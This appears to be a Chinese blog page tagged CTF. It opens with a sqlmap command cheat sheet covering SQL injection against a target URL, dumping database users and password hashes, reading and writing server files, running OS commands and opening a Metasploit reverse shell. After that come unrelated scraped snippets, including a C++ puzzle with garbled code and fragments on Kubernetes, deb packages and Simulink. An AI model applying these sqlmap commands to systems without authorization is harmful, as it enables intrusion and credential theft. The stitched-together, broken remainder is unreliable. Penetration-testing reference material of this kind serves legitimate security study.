技术标签: CTF sqlmap sqlmap使用 sqlmap命令
推荐参考博客:https://blog.csdn.net/gmnet/article/details/7894834
-u #注入点
-f #指纹判别数据库类型
-b #获取数据库版本信息
-p #指定可测试的参数(?page=1&id=2 -p “page,id”)
-D “” #指定数据库名
-T “” #指定表名
-C “” #指定字段
-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume)
–columns #列出字段
–current-user #获取当前用户名称
–current-db #获取当前数据库名称
–users #列数据库所有用户
–passwords #数据库用户所有密码
–privileges #查看用户权限(–privileges -U root)
-U #指定数据库用户
–dbs #列出所有数据库
–tables -D “” #列出指定数据库中的表
–columns -T “user” -D “mysql” #列出mysql数据库中的user表的所有字段
–dump-all #列出所有数据库所有表
–exclude-sysdbs #只列出用户自己新建的数据库和表
–dump -T “数据库” -D “表” -C “字段” #列出指定数据库的表的字段的数据(–dump -T users -D master -C surname)
–dump -T “” -D “” –start 2 –top 4 # 列出指定数据库的表的2-4字段的数据
–dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
–os #指定系统(Linux,Windows)
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
–privileges #查看权限
–is-dba #是否是数据库管理员
–roles #枚举数据库用户角色
–udf-inject #导入用户自定义函数(获取系统权限)
–union-check #是否支持union 注入
–union-cols #union 查询表记录
–union-test #union 语句测试
–union-use #采用union 注入
–union-tech orderby #union配合order by
–method “POST” –data “” #POST方式提交数据(–method “POST” –data “page=1&id=2″)
–cookie “用;号分开” #cookie注入(–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
–referer “” #使用referer欺骗(–referer “http://www.baidu.com”)
–user-agent “” #自定义user-agent
–proxy “http://127.0.0.1:8118″ #代理注入
–string “” #指定关键词
–threads #采用多线程(–threads 3)
–sql-shell #执行指定sql命令
–sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ )
–file-read #读取指定文件
–file-write #写入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–file-dest #要写入的文件绝对路径
–os-cmd=id #执行系统命令
–os-shell #系统交互shell
–os-pwn #反弹shell(–os-pwn –msf-path=/opt/framework/msf3/)
–msf-path= #matesploit绝对路径(–msf-path=/opt/framework/msf3/)
–os-smbrelay #
–os-bof #
–reg-read #读取win系统注册表
–priv-esc #
–time-sec= #延迟设置 默认–time-sec=5 为5秒
-p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)” #指定user-agent注入
–eta #盲注
sqlmap.py -u url 判断
sqlmap.py -u url –is-dba 判断是不是root权限
sqlmap.py -u url –is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url –users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url –passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url –privileges -v 0 这是判断当前的权限
sqlmap.py -u url –dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url –tables -D ‘表’ 爆表
sqlmap.py -u url –columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url –dump -T ‘表’ –start 1 –stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url –dump -all -v 0
#includeusing namespace std;int main(){int foo[] = {1,2,3,4,5,6};cout return 0;}程序运行结果为:8因为不理解[foo]是什么意思,就把是输出各项拆开(1+3)[foo]的输出:5foo[0]的输出:1(foo+1)[2]的输出:4结果为5-1+4=8.
写在前面``mermaidflowchat内容
matlab学习笔记——isnan
MeasureSpec的源码: /** * A MeasureSpec encapsulates the layout requirements passed from parent to child. * Each MeasureSpec represents a requirement for either the width or the height. *
一、Kubernetes系列之介绍篇1.背景介绍 云计算飞速发展 - IaaS - PaaS - SaaS Docker技术突飞猛进 -一次构建,到处运行 -容器的快速轻量 -完整的生态环境2.什么是kubernetes 首先,他是一个全新的基于容器技术的分布式架构领先方案。Kubernetes(k8s)是Google开源的容器集群管理系统(谷歌内部:Borg)。在Docker技术的基础上,为容器化的应用提供部署运行...
一、deb包详解1->deb 包的文件结构deb 软件包里面的结构:它具有DEBIAN和软件具体安装目录(如etc, usr, opt, tmp等)。deb包本身有三部分组成 组成 详细 数据包 包含实际安装的程序数据,文件名为“data.tar.XXX” 安装信息及控制包 包含deb的安装说明,标识,脚本等,文件名为“control.tar.gz”...
卸载Python方法一: 1、找到安装包------双击------点击 Uninstall 。 2、接下来只需等待加载完成就可以了。 3、出现这个界面后就是卸载成功了,点击 Close 关闭即可。方法二: 1、找到“此电脑”------右击鼠标------属性------找到“控制面板”------左键单击。 2、找到“卸载程序”------左键单击。 3、在此处找到 Python 3.9.1(64-bit) 和 Python Launcher 两个选项------右键
使用Ulipad编辑的#! /usr/bin/env python#coding=utf-8#############import subprocessimport timeip="10.210.202."#############def aa(): ks=int(time.time()) #记录开始时间 num1=num2...
aria2.service [Unit]Description=Aria2 ServiceAfter=network.target[Service]ExecStart=/usr/bin/aria2c --enable-rpc --rpc-listen-all --rpc-...
Description 给出n个字符串a1,…,an,将这n个字符串组合起来,问字典序最小的 Input 第一行一整数n表示字符串数量,之后n个串长不超过50的串,总串厂不超过5e4(1<=n<=5e4) Output 输出字典序最小的组合方案 Sample Input 4 abba abacaba bcd er Sample Output abacabaabbabcder
xshell ssh连接linux时提示ssh服务器拒绝了密码
Conversions of data types of parameters and signals in Simulink simulations.Example highlighting how the data types are converted and arithmeticoperations are performed on inputs and parameters in th...